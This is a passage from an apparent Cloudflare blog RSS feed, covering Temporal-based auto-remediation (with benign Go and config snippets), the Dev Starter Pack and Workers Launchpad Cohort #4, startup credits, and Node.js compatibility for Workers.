# 1. This workflow is not run at the same time in a 15m window.
# 2. This workflow will not run more than once an hour.
# 3. This workflow will not run more than 3 times in one day.
#
constraint {
    kind = "concurrency"
    value = "1"
    period = "15m"
}

constraint {
    kind = "maxExecution"
    value = "1"
    period = "1h"
}

constraint {
    kind = "maxExecution"
    value = "3"
    period = "24h"
    is_global = true
}
</code></pre>
            
    <div>
      <h3>Step two: Task Routing is amazing</h3>
      <a href="#step-two-task-routing-is-amazing">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4wOIwKfkKzp7k46Z6tPuhW/f35667a65872cf7a90fc9c03f38a48d5/Task_Routing_is_amazing_process.png" />
          </figure><p>An unforeseen benefit of using a central Temporal cluster was the discovery of Task Routing. This feature allows us to schedule a Workflow/Activity on any server that has a running Temporal Worker, and further segment by the type of server, its location, etc. For this reason, we have three primary task queues — the general queue in which tasks can be executed by any worker in the datacenter, the node type queue in which tasks can only be executed by a specific node type in the datacenter, and the individual node queue where we target a specific node for task execution.</p><p>We rely on this heavily to ensure the speed and efficiency of automated remediation. Certain tasks can be run in datacenters with known low latency to an external resource, or a node type with better performance than others (due to differences in the underlying hardware). This reduces the amount of failure and latency we see overall in task executions. Sometimes we are also constrained by certain types of tasks that can only run on a certain node type, such as a database.</p><p>Task Routing also means that we can configure certain task queues to have a higher priority for execution, although this is not a feature we have needed so far. A drawback of task routing is that every Workflow/Activity needs to be registered to the target task queue, which is a common gotcha. Thankfully, it is possible to catch this failure condition with proper testing.</p>
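<p>The three-tier scheme can be illustrated with a small helper that picks a task queue for a workflow target, falling through from the most specific queue to the most general. The queue naming convention here is purely hypothetical:</p>

```go
package main

import "fmt"

// queueFor returns a Temporal task queue name for a workflow target,
// preferring the most specific tier available: a single node, then a
// node type within the datacenter, then the datacenter-wide general
// queue. All names are illustrative.
func queueFor(datacenter, nodeType, node string) string {
	switch {
	case node != "":
		return fmt.Sprintf("%s.node.%s", datacenter, node)
	case nodeType != "":
		return fmt.Sprintf("%s.type.%s", datacenter, nodeType)
	default:
		return fmt.Sprintf("%s.general", datacenter)
	}
}

func main() {
	fmt.Println(queueFor("ams01", "", ""))         // any worker in the datacenter
	fmt.Println(queueFor("ams01", "database", "")) // only database nodes
	fmt.Println(queueFor("ams01", "", "node-42"))  // one specific node
}
```

<p>The common gotcha mentioned above maps directly onto this: a worker only executes tasks from queues it registered its Workflows/Activities on, so each of these queue names needs a matching registration.</p>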
    <div>
      <h3>Step three: when/how to self-heal?</h3>
      <a href="#step-three-when-how-to-self-heal">
        
      </a>
    </div>
<p>None of this would be relevant if we didn’t put it to good use. A primary design goal for the platform was to ensure we had easy, quick ways to trigger workflows on the most important failure conditions. The next step was to determine the best sources from which to trigger these actions. The answer to this was simple: we could trigger workflows from anywhere as long as they are properly authorized and detect the failure conditions accurately.</p><p>Example triggers are an alerting system, a log tailer, a health check daemon, or an authorized engineer via a chatbot. Such flexibility allows a high level of reuse, and lets us invest more in workflow quality and reliability.</p><p>As part of the solution, we built a daemon that is able to poll a signal source for any unwanted condition and trigger a configured workflow. We initially found <a href="https://blog.cloudflare.com/how-cloudflare-runs-prometheus-at-scale"><u>Prometheus</u></a> useful as a source because it contains both service-level and hardware/system-level metrics. We are also exploring more event-based trigger mechanisms, which could eliminate the need to use precious system resources to poll for metrics.</p><p>We already had internal services that are able to detect widespread failure conditions for our customers, but were only able to page a human. With the adoption of auto-remediation, these systems are now able to react automatically. This ability to create an automatic feedback loop with our customers is the cornerstone of these self-healing capabilities, and we continue to work on stronger signals, faster reaction times, and better prevention of future occurrences.</p><p>The most exciting part, however, is the future possibility. Every customer cares about any negative impact from Cloudflare. 
With this platform we can onboard several services (especially those that are foundational for the critical path) and ensure we react quickly to any failure conditions, even before there is any visible impact.</p>
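<p>A single polling cycle of such a trigger daemon might look like the following hypothetical Go sketch, in which the metric query (for example, against Prometheus) and the call to the coordinator are injected as functions. All metric and workflow names are illustrative:</p>

```go
package main

import "fmt"

// trigger pairs a polled failure condition with the remediation
// workflow to schedule when it fires (names are illustrative).
type trigger struct {
	metric    string
	threshold float64
	workflow  string
}

// check runs one polling cycle: query returns the current value of a
// metric, and schedule submits a workflow request to the coordinator
// (which then enforces authorization and safety constraints). It
// returns the names of the workflows that were triggered.
func check(triggers []trigger, query func(string) float64, schedule func(string)) []string {
	var fired []string
	for _, t := range triggers {
		if query(t.metric) > t.threshold {
			schedule(t.workflow)
			fired = append(fired, t.workflow)
		}
	}
	return fired
}

func main() {
	metrics := map[string]float64{"node_cpu_temp_celsius": 95, "disk_errors_total": 0}
	triggers := []trigger{
		{metric: "node_cpu_temp_celsius", threshold: 90, workflow: "drain-and-cool"},
		{metric: "disk_errors_total", threshold: 0, workflow: "replace-disk"},
	}
	fired := check(triggers,
		func(m string) float64 { return metrics[m] },
		func(w string) { fmt.Println("scheduling", w) })
	fmt.Println(fired)
}
```

<p>Keeping the daemon this thin means the same trigger shape works for any signal source, whether a metrics poller, a log tailer, or a chatbot command.</p>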
    <div>
      <h3>Step four: packaging and deployment</h3>
      <a href="#step-four-packaging-and-deployment">
        
      </a>
    </div>
    <p>The whole system is written in <a href="https://go.dev/"><u>golang</u></a>, and a single binary can implement each role. We distribute it as an apt package or a container for maximum ease of deployment.</p><p>We deploy a Temporal-based worker to every server we intend to run tasks on, and a daemon in datacenters where we intend to automatically trigger workflows based on the local conditions. The coordinator is more nuanced since we rely on task routing and can trigger from a central coordinator, but we have also found value in running coordinators locally in the datacenters. This is especially useful in datacenters with less capacity or degraded performance, removing the need for a round-trip to schedule the workflows.</p>
    <div>
      <h3>Step five: test, test, test</h3>
      <a href="#step-five-test-test-test">
        
      </a>
    </div>
<p>Temporal provides native mechanisms to test an entire workflow, via a <a href="https://docs.temporal.io/develop/go/testing-suite"><u>comprehensive test suite</u></a> that supports end-to-end, integration, and unit testing, which we used extensively to prevent regressions while developing. We also ensured proper test coverage for all the critical platform components, especially the coordinator.</p><p>Despite the ease of writing these tests, we quickly discovered that they were not enough. After writing workflows, engineers need an environment as close as possible to the target conditions. This is why we configured our staging environments to support quick and efficient testing. These environments receive the latest changes and point to a different (staging) Temporal cluster, which enables experimentation and easy validation of changes.</p><p>After a workflow is validated in the staging environment, we can then do a full release to production. It seems obvious, but catching simple configuration errors before releasing has saved us many hours of development and change-related work.</p>
    <div>
      <h2>Deploying to production</h2>
      <a href="#deploying-to-production">
        
      </a>
    </div>
    <p>As you can guess from the title of this post, we put this in production to automatically react to server-specific errors and unrecoverable failures. To this end, we have a set of services that are able to detect single-server failure conditions based on analyzed traffic data. After deployment, we have successfully mitigated potential impact by taking any errant single sources of failure out of production.</p><p>We have also created a set of workflows to reduce internal toil and improve efficiency. These workflows can automatically test pull requests on target machines, wipe and reset servers after experiments are concluded, and take away manual processes that cost many hours in toil.</p><p>Building a system that is maintained by several SRE teams has allowed us to iterate faster, and rapidly tackle long-standing problems. We have set ambitious goals regarding toil elimination and are on course to achieve them, which will allow us to scale faster by eliminating the human bottleneck.</p>
    <div>
      <h2>Looking to the future</h2>
      <a href="#looking-to-the-future">
        
      </a>
    </div>
    <p>Our immediate plans are to leverage this system to provide a more reliable platform for our customers and drastically reduce operational toil, freeing up engineering resources to tackle larger-scale problems. We also intend to leverage more Temporal features such as <a href="https://docs.temporal.io/develop/go/versioning"><u>Workflow Versioning</u></a>, which will simplify the process of making changes to workflows by ensuring that triggered workflows run expected versions. </p><p> We are also interested in how others are solving problems using durable execution platforms such as Temporal, and general strategies to eliminate toil. If you would like to discuss this further, feel free to reach out on the <a href="https://community.cloudflare.com"><u>Cloudflare Community</u></a> and start a conversation!</p><p>If you’re interested in contributing to projects that help build a better Internet, <a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering&amp;location=default"><u>our engineering teams are hiring</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Edge]]></category>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Speed & Reliability]]></category>
            <guid isPermaLink="false">2i9tHkPAfy7GxYAioGM100</guid>
            <dc:creator>Opeyemi Onikute</dc:creator>
        </item>
        <item>
            <title><![CDATA[Empowering builders: introducing the Dev Alliance and Workers Launchpad Cohort #4]]></title>
            <link>https://blog.cloudflare.com/launchpad-cohort4-dev-starter-pack/</link>
            <pubDate>Fri, 27 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Empowering developers with the Dev Starter Pack and Workers Cohort #4: get free or discounted access to essential developer tools and meet the latest set of incredible startups building on Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>Today we’re announcing the Dev Starter Pack, an alliance of innovative developer tools offering discounts and free services to help you get started. We’re also excited to share an update on our <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Workers Launchpad Program</u></a>.</p><p>Creating from the ground up often means spending countless hours piecing together the right development stack, navigating different pricing models, and managing growing costs — all of which can take your focus away from what truly matters: building your product and growing your business.</p>
    <div>
      <h3>Introducing Dev Starter Pack: the tools you need to start building your startup</h3>
      <a href="#introducing-dev-starter-pack-the-tools-you-need-to-start-building-your-startup">
        
      </a>
    </div>
    <p>Hey! <a href="https://x.com/thedanigrant"><u>Dani Grant</u></a> here, one of the first PMs at Cloudflare and co-founder of <a href="https://jam.dev"><u>Jam.dev</u></a>. Ten years ago (during 2014’s Birthday Week), Cloudflare <a href="https://blog.cloudflare.com/introducing-universal-ssl"><u>launched Universal SSL</u></a>, making SSL free on the Internet for the first time, and in one night <a href="https://blog.cloudflare.com/introducing-universal-ssl"><u>doubling</u></a> the size of the encrypted web.</p><p>I was a college student back then, and I immediately became enraptured by Cloudflare’s mission: helping build a better Internet. As part of this mission, Cloudflare has developed powerful tools typically accessible only to Internet giants, oftentimes offering them for free to developers and individuals alike. Heck yeah! I joined Cloudflare in January 2015, and 5 years after that, co-founded a developer tool company called Jam, inspired by the impact that I saw building tools for developers could have while at Cloudflare.</p><p>It’s now 10 years later, and a lot has changed –– “software ate the world” and it’s now powering all aspects of our lives, from health to finances to how we work. It’s more important than ever to empower every developer with the best tools available, because the faster we build software, the sooner people’s experiences improve.</p><p>Today we’re thrilled to announce the Dev Starter Pack, an alliance of like-minded dev tool companies giving away their services for free, or heavily discounting them for developers who want to start companies and build the future.</p><p>Not only does this stack include all the tools you need to build a startup, it also includes all the tools you need to build AI-powered features. 
We believe that the next wave of startups will be AI-native, as AI becomes as ubiquitous as the electricity that powers the servers.</p><p>We haven’t even scratched the surface of what’s possible with AI, and we hope this launch gets developers closer to solving the challenges of building non-deterministic software.</p><p>If you’re a software engineer who wants to build a project or a company and needs an off-the-shelf stack of dev tools to get started, go to <a href="http://devstarterpack.io"><u>devstarterpack.io</u></a> to start using all of these tools.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4YVrWHCfk96YagkSw2uK5l/71053eb95a2d434c93ad1464a41bac6a/image1.png" />
            
            </figure><p>Each provider is offering developers a heavily discounted or even free plan to get started building. You can redeem these services by either using the special code “devstarterpack” or selecting “Dev Starter Pack” while applying to relevant programs.</p><p>We welcome more tools to join the alliance — this is just the beginning. If you are building a developer tool and would like to include your product in the Dev Starter Pack, let us know <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>here</u></a>.</p>
    <div>
      <h3>What will you build?</h3>
      <a href="#what-will-you-build">
        
      </a>
    </div>
    <p>We are very excited to see what you will build. Please share with us in <a href="https://discord.com/invite/cloudflaredev"><u>Cloudflare’s Discord</u></a> and <a href="https://community.cloudflare.com/c/developers/39"><u>community forum</u></a>, so we can support you however it makes sense.</p><p>Software developers are changing the world, and we believe in providing support to help you make an even greater impact. If you’re looking for additional funding or support, check out <a href="https://blog.cloudflare.com/tag/workers-launchpad"><u>Cloudflare’s Launchpad</u></a> for developers turned founders building startups.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Vk47oye4jwsFn5DxffQkw/07b78fdd06ef24c09f3b0afe8ed585b5/image3.png" />
          </figure>
    <div>
      <h3>Introducing Workers Launchpad Cohort #4</h3>
      <a href="#introducing-workers-launchpad-cohort-4">
        
      </a>
    </div>
    <p>Melissa and Chris from the <a href="http://www.cloudflare.com/forstartups"><u>Cloudflare for Startups</u></a> team here. Our team is blown away by what customers are demonstrating on the Developer Platform. Just a few weeks ago, our Workers Launchpad Cohort #3 wrapped up. On <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-3/pgx2jLal"><u>Demo Day</u></a>, customers demoed their applications built on Cloudflare, spanning AI, dev tools, IaaS, observability, SaaS, media, and beyond. We’re incredibly proud of Cohort #3 participants, and we look forward to their continued success with Cloudflare.</p><p>Following Demo Day of Workers Launchpad Cohort #3, we’ve been excited to receive a surge of new applications from startups around the world. These startups are pushing the boundaries of innovation, particularly in areas like observability, PaaS, AI, automation, and e-commerce. Many startups that applied this go-around demonstrated that they’ve built some great applications on Cloudflare, and today, we’re excited to announce the accepted participants for our upcoming Workers Launchpad Cohort #4.</p><p>Let’s take a look at what Cohort #4 participants are building in their own words:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3WpVBXMoY8W2yzMpwh5keq/90be94945d04b122ec4dd090414ea014/image4.png" />
            
            </figure><table><tr><td><p><a href="https://adster.tech"><b>Adster</b></a></p></td><td><p>Hyperscale revenue powered by real-time data intelligence and AI</p></td></tr><tr><td><p><a href="http://www.almeta.cloud"><b>Almeta</b></a></p></td><td><p>Predict customer behavior on your website</p></td></tr><tr><td><p><a href="http://www.bestparents.com"><b>Best Parents</b></a></p></td><td><p>Disruptive educational travel marketplace for Gen Z under 18</p></td></tr><tr><td><p><a href="http://www.comigo.ai"><b>Comigo</b></a></p></td><td><p>Companion app to make therapy an engaging daily practice</p></td></tr><tr><td><p><a href="http://www.datastrato.com"><b>Datastrato</b></a></p></td><td><p>A unified data catalog for generative AI infrastructure</p></td></tr><tr><td><p><a href="https://equimake.com/"><b>Equimake</b></a></p></td><td><p>Create professional 3D projects without technical experience</p></td></tr><tr><td><p><a href="http://www.evefan.com"><b>Evefan</b></a></p></td><td><p>Your own Internet scale events infrastructure</p></td></tr><tr><td><p><a href="https://www.eventuall.live/"><b>Eventuall</b></a></p></td><td><p>Connecting stars with their fans in paid meet &amp; greets and virtual experiences</p></td></tr><tr><td><p><a href="http://www.fermat.app"><b>Fermat</b></a></p></td><td><p>No-code solution to deploy AI models as internal tools</p></td></tr><tr><td><p><a href="https://fiberplane.com"><b>Fiberplane</b></a></p></td><td><p>Development tool that uses observability data to help test and debug APIs</p></td></tr><tr><td><p><a href="http://www.firetiger.com"><b>Firetiger</b></a></p></td><td><p>An engineering observability tool that operates at scale inside customer infrastructure</p></td></tr><tr><td><p><a href="https://flightcast.com/"><b>Flightcast</b></a></p></td><td><p>Video-first podcast hosting &amp; distribution</p></td></tr><tr><td><p><a href="http://www.runway-vision.com"><b>FlightLevel Technologies</b></a></p></td><td><p>AI Analytics and 
Footage in the aviation industry.</p></td></tr><tr><td><p><a href="https://gitlip.com/"><b>Gitlip</b></a></p></td><td><p>Powerful, collaborative and lightweight computing platform based on Git</p></td></tr><tr><td><p><a href="http://www.gracker.ai"><b>GrackerAI</b></a></p></td><td><p>AI-powered organic growth engine for cybersecurity B2B SaaS</p></td></tr><tr><td><p><a href="https://hackernoon.com/"><b>Hackernoon</b></a></p></td><td><p>Community-driven blogging network read by millions of technologists</p></td></tr><tr><td><p><a href="https://hanabi.rest/"><b>Hanabi.REST</b></a></p></td><td><p>Prompt to REST API with AI-driven building, testing, and deployment</p></td></tr><tr><td><p><a href="http://www.infrastack.ai"><b>Infrastack</b></a></p></td><td><p>Next-gen application intelligence and observability platform for developers</p></td></tr><tr><td><p><a href="https://www.june.technology/"><b>June</b></a></p></td><td><p>AI productivity companion</p></td></tr><tr><td><p><a href="https://leed.ai/"><b>Leed AI</b></a></p></td><td><p>Combined marketing workflows, website, and customer journey for a seamless, AI-accelerated experience</p></td></tr><tr><td><p><b></b><a href="http://www.lookbk.com"><b>lookbk</b></a></p></td><td><p>Make the Internet more shoppable, starting with fashion on socials</p></td></tr><tr><td><p><a href="https://materialized.dev/"><b>Materialized Intelligence</b></a></p></td><td><p>Data-intensive inference solutions</p></td></tr><tr><td><p><a href="https://maxint.com/"><b>Maxint</b></a></p></td><td><p>Multi-platform money management powered by AI</p></td></tr><tr><td><p><a href="http://www.midio.com"><b>Midio</b></a></p></td><td><p>Visual tool to build software and AI agents</p></td></tr><tr><td><p><a href="http://www.nika.eco"><b>NikaPlanet</b></a></p></td><td><p>Transformative geospatial analytics experience with Google Colab, QGIS, ChatGPT, and Miro in one solution</p></td></tr><tr><td><p><a 
href="http://www.nothotdog.dev"><b>NotHotDog</b></a></p></td><td><p>AI-Powered API Testing Tool</p></td></tr><tr><td><p><a href="https://www.outerbase.com/"><b>Outerbase</b></a></p></td><td><p>View, edit, query, and visualize your data with AI</p></td></tr><tr><td><p><a href="http://www.procureezy.com"><b>Procureezy</b></a></p></td><td><p>AI procurement platform to empower hardware engineers to source smarter and launch sooner</p></td></tr><tr><td><p><a href="http://www.proma.ai"><b>Proma</b></a></p></td><td><p>Process management and automation platform to get work done fast</p></td></tr><tr><td><p><a href="https://www.renderbetter.com/"><b>Render Better</b></a></p></td><td><p>Increase e-commerce revenue by optimizing your site speed, automatically</p></td></tr><tr><td><p><a href="http://www.sherpo.io"><b>Sherpo</b></a></p></td><td><p>AI-first no-code platform to build and sell digital content</p></td></tr><tr><td><p><a href="https://speak.careers/"><b>Speak_</b></a></p></td><td><p>AI platform to surface top talent by evaluating candidates against custom criteria</p></td></tr><tr><td><p><a href="https://tightknit.ai/"><b>Tightknit</b></a></p></td><td><p>Embedded community engagement platform built for SaaS</p></td></tr><tr><td><p><a href="https://www.tinfoil.sh/"><b>Tinfoil</b></a></p></td><td><p>Powerful analytics with cryptographic privacy guarantees</p></td></tr><tr><td><p><a href="https://www.usevelvet.com/"><b>Velvet</b></a></p></td><td><p>AI gateway to monitor, evaluate, and optimize features</p></td></tr><tr><td><p><a href="https://webstudio.is/"><b>Webstudio</b></a></p></td><td><p>An advanced visual site builder that connects to any headless CMS</p></td></tr><tr><td><p><a href="https://ziprlinks.com/"><b>Zipr</b></a></p></td><td><p>Streamlined visitor management</p></td></tr></table><p>The Cloudflare team is ecstatic to work with the amazing participants of Cohort #4. 
If you want to follow along on Cohort #4’s journey, be sure to follow <a href="https://x.com/CloudflareDev"><u>@CloudflareDev</u></a> on X and join our <a href="https://discord.com/invite/cloudflaredev?cf_target_id=4874A68FFE682C2DFA5CB8063B4025ED"><u>Developer Discord</u></a> server.</p><p>Are you a startup building on Cloudflare? <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Apply for Cohort #5!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">2Q277uIpNI04K4kTcUXLkf</guid>
            <dc:creator>Melissa Kargiannakis</dc:creator>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Veronica Marin</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup Program revamped: build and grow on Cloudflare with up to $250,000 in credits]]></title>
            <link>https://blog.cloudflare.com/startup-program-250k-credits/</link>
            <pubDate>Thu, 26 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s Startup Program now offers up to $250,000 in credits for companies building on our Developer Platform. The program relaunch uses clear and predictable credits so that you can easily see how usage impacts future pricing.  ]]></description>
            <content:encoded><![CDATA[ <p>Today, we’re pleased to offer startups up to $250,000 in credits to use on Cloudflare’s <a href="https://www.cloudflare.com/developer-platform/products/"><u>Developer Platform</u></a>. This new credits system lets you clearly see usage and associated fees, so you can plan for a predictable future after the $250,000 in credits have been used up or after one year, whichever happens first.</p><p>You can see eligibility criteria and apply to the Startup Program <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a>.</p>
    <div>
      <h2>What can you use the credits for?</h2>
      <a href="#what-can-you-use-the-credits-for">
        
      </a>
    </div>
    <p>Credits can be applied to all Developer Platform products, as well as <a href="https://developers.cloudflare.com/argo-smart-routing/"><u>Argo</u></a> and <a href="https://developers.cloudflare.com/cache/advanced-configuration/cache-reserve/"><u>Cache Reserve</u></a>. Moreover, we provide participants with up to three <a href="https://www.cloudflare.com/plans/"><u>Enterprise-level domains</u></a>, which includes CDN, DDoS, DNS, WAF, Zero Trust, and other <a href="https://www.cloudflare.com/application-services/products/"><u>security and performance products</u></a> that a participant can enable for their website.</p>
    <div>
      <h3>Developer tools and building on Cloudflare</h3>
      <a href="#developer-tools-and-building-on-cloudflare">
        
      </a>
    </div>
    <p>You can use credits for Cloudflare Developer Platform products, including those listed in the table below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/QXGJp4eBt8AQTXleACTnI/a4b0dda0167733d9e04a8bf1ed5bc611/image1.png" />
            
            </figure><p><sup><i>Note: credits for the Cloudflare Startup Program apply to Cloudflare products only; this table is illustrative of similar products in the market.</i></sup></p>
    <div>
      <h3>Speed and performance with Cloudflare</h3>
      <a href="#speed-and-performance-with-cloudflare">
        
      </a>
    </div>
    <p>We know that founders need all the help they can get when starting their businesses. Beyond the Developer Platform, you can also use the Startup Program for our speed and performance products. Getting customers where they need to go within <a href="https://developers.cloudflare.com/speed/"><u>milliseconds</u></a> on your website or application is the difference between closing a sale and not. You can test your speed <a href="https://developers.cloudflare.com/fundamentals/basic-tasks/test-speed/"><u>here</u></a> and learn how to optimize your speed and performance <a href="https://developers.cloudflare.com/learning-paths/get-started/performance/optimize-speed/"><u>here</u></a> with solutions like <a href="https://developers.cloudflare.com/images/"><u>Images</u></a>, <a href="https://developers.cloudflare.com/argo-smart-routing/"><u>Argo</u></a>, and <a href="https://developers.cloudflare.com/cache/advanced-configuration/early-hints/"><u>Early Hints</u></a>.</p>
    <div>
      <h3>Security from Cloudflare</h3>
      <a href="#security-from-cloudflare">
        
      </a>
    </div>
    <p>But, wait, there’s more: beyond the Developer Platform products and speed tools, you can also use Cloudflare’s many security features through the Startup Program. These include <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall</u></a> (WAF), <a href="https://developers.cloudflare.com/ddos-protection/reference/alerts/"><u>DDoS Alerts</u></a>, bundled <a href="https://www.cloudflare.com/plans/"><u>protection plans</u></a>, and more. The Startup Program also includes <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>Zero Trust</u></a> solutions. Learn how others are <a href="https://www.cloudflare.com/case-studies/?usecase=Enable+zero+trust+security+for+workforce"><u>securing their technology and tools</u></a> with Cloudflare Zero Trust.</p><p>For more inspiration, check out our <a href="https://workers.cloudflare.com/built-with/"><u>Built with Cloudflare site</u></a>, which highlights what other startups are building.</p>
    <div>
      <h2>Who can use the credits?</h2>
      <a href="#who-can-use-the-credits">
        
      </a>
    </div>
    <p>Eligibility criteria can be found <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a> and include:</p><ul><li><p><code><i>Companies building a software-based product or service</i></code></p></li><li><p><code><i>Founded within the last 5 years (2019-2024)</i></code></p></li><li><p><code><i>Have between $50,000 - $5,000,000 in funding</i></code></p><ul><li><p><code><i>Note that for startups who have not yet raised at least $50,000, there may be other opportunities for lower credit amounts. Please apply with the promo code “BOOTSTRAPPED” if you haven’t raised $50,000 yet, but are interested in the Cloudflare Startup Program</i></code></p></li></ul></li><li><p><code><i>Have a LinkedIn profile, valid website, and email address</i></code></p></li><li><p><code><i>Bonus criteria that adds to your application: being part of an approved accelerator</i></code></p></li></ul>
    <div>
      <h2>What will you build?</h2>
      <a href="#what-will-you-build">
        
      </a>
    </div>
    <p>We’re excited to see what you will build. Please <a href="https://discord.com/invite/cloudflaredev"><u>share what you’re up to with us</u></a> so that we can help you however it makes sense. If you’re actively using Cloudflare’s Developer Platform, we’d love to hear more about what you’re building and share it on our <a href="https://workers.cloudflare.com/built-with/"><u>Built with Cloudflare site</u></a>.</p><p>Are you a startup looking for additional support, resources, or access to funding? Apply for our <a href="https://blog.cloudflare.com/tag/workers-launchpad"><u>Workers Launchpad Program</u></a>! The program runs for a few months, and in addition to the Startup Program, participants get access to hands-on bootcamp sessions, Solutions Architect office hours, introductions to VCs, and the opportunity to present at Demo Day.</p>
    <div>
      <h2>Why does Cloudflare support founders and startups? </h2>
      <a href="#why-does-cloudflare-support-founders-and-startups">
        
      </a>
    </div>
    <p>Founders and developers face enough challenges without having to worry about incurring egregious costs to test technology and start building in the earliest days. You have the world at your fingertips and should be empowered to build and create without limitations. Invest money in your innovation, not in the infrastructure and technology that supports it.</p><p>The Startup Program understands this founder experience deeply, as the team is made up of former founders. Cloudflare is committed to programs like this to empower founders building the <i>next big thing</i>. Offering up to $250,000 in credits will allow folks to leverage even more of what we have to offer: a developer experience that removes friction, saves money, and gets applications spun up in hours, not days. </p><p>We want to support founders from everywhere on earth.</p><p>Be bold and keep building! Follow <a href="https://x.com/cloudflaredev"><u>@CloudflareDev</u></a> and join our <a href="https://discord.com/invite/cloudflaredev"><u>Developer Discord</u></a> server.</p><p>Are you a startup building on Cloudflare? <a href="https://www.cloudflare.com/forstartups"><u>Apply here!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">4ZEcwzAEh1rg9IxDqC3UyM</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Melissa Kargiannakis</dc:creator>
        </item>
        <item>
            <title><![CDATA[More NPM packages on Cloudflare Workers: Combining polyfills and native code to support Node.js APIs]]></title>
            <link>https://blog.cloudflare.com/more-npm-packages-on-cloudflare-workers-combining-polyfills-and-native-code/</link>
            <pubDate>Mon, 09 Sep 2024 21:00:00 GMT</pubDate>
            <description><![CDATA[ Workers now supports more NPM packages and Node.js APIs using an overhauled hybrid compatibility layer. ]]></description>
            <content:encoded><![CDATA[ <p>Today, we are excited to announce a preview of <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>improved Node.js compatibility</u></a> for Workers and Pages. Broader compatibility lets you use more NPM packages and take advantage of the JavaScript ecosystem when writing your Workers.</p><p>Our newest version of Node.js compatibility combines the best features of our previous efforts. <a href="https://workers.cloudflare.com/"><u>Cloudflare Workers</u></a> have supported Node.js in some form for quite a while. We first announced polyfill support in <a href="https://blog.cloudflare.com/node-js-support-cloudflare-workers"><u>2021</u></a>, and later added <a href="https://blog.cloudflare.com/workers-node-js-asynclocalstorage"><u>built-in support for parts of the Node.js API</u></a> that has <a href="https://blog.cloudflare.com/workers-node-js-apis-stream-path"><u>expanded</u></a> over time.</p><p>The latest changes make it even better:</p><ul><li><p>You can use far more <a href="https://en.wikipedia.org/wiki/Npm"><u>NPM</u></a> packages on Workers.</p></li><li><p>You can use packages that do not use the <code>node:</code> prefix to import Node.js APIs.</p></li><li><p>You can use <a href="https://workers-nodejs-compat-matrix.pages.dev/"><u>more Node.js APIs on Workers</u></a>, including most methods on <a href="https://nodejs.org/docs/latest/api/async_hooks.html"><code><u>async_hooks</u></code></a>, <a href="https://nodejs.org/api/buffer.html"><code><u>buffer</u></code></a>, <a href="https://nodejs.org/api/dns.html"><code><u>dns</u></code></a>, <a href="https://nodejs.org/docs/latest/api/os.html"><code><u>os</u></code></a>, and <a href="https://nodejs.org/docs/latest/api/events.html"><code><u>events</u></code></a>. 
Many more, such as <a href="https://nodejs.org/api/fs.html"><code><u>fs</u></code></a> or <a href="https://nodejs.org/docs/latest/api/process.html"><code><u>process</u></code></a>, are importable with mocked methods.</p></li></ul><p>To give it a try, add the following flag to <code>wrangler.toml</code>, and deploy your Worker with <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>:</p><p><code>compatibility_flags = ["nodejs_compat_v2"]</code></p><p>Packages that could not be imported with <code>nodejs_compat</code>, even as a dependency of another package, will now load. This includes popular packages such as <a href="https://www.npmjs.com/package/body-parser">body-parser</a>, <a href="https://www.npmjs.com/package/jsonwebtoken">jsonwebtoken</a>, <a href="https://www.npmjs.com/package/got">got</a>, <a href="https://www.npmjs.com/package/passport">passport</a>, <a href="https://www.npmjs.com/package/md5">md5</a>, <a href="https://www.npmjs.com/package/knex">knex</a>, <a href="https://www.npmjs.com/package/mailparser">mailparser</a>, <a href="https://www.npmjs.com/package/csv-stringify">csv-stringify</a>, <a href="https://www.npmjs.com/package/cookie-signature">cookie-signature</a>, <a href="https://www.npmjs.com/package/stream-slice">stream-slice</a>, and many more.</p><p>This behavior will soon become the default for all Workers with the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>existing nodejs_compat compatibility flag</u></a> enabled, and a <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/"><u>compatibility date</u></a> of 2024-09-23 or later. As you experiment with improved Node.js compatibility, share your feedback by <a href="https://github.com/cloudflare/workers-sdk/issues/new?assignees=&amp;labels=bug&amp;projects=&amp;template=bug-template.yaml&amp;title=%F0%9F%90%9B+BUG%3A"><u>opening an issue on GitHub</u></a>.</p>
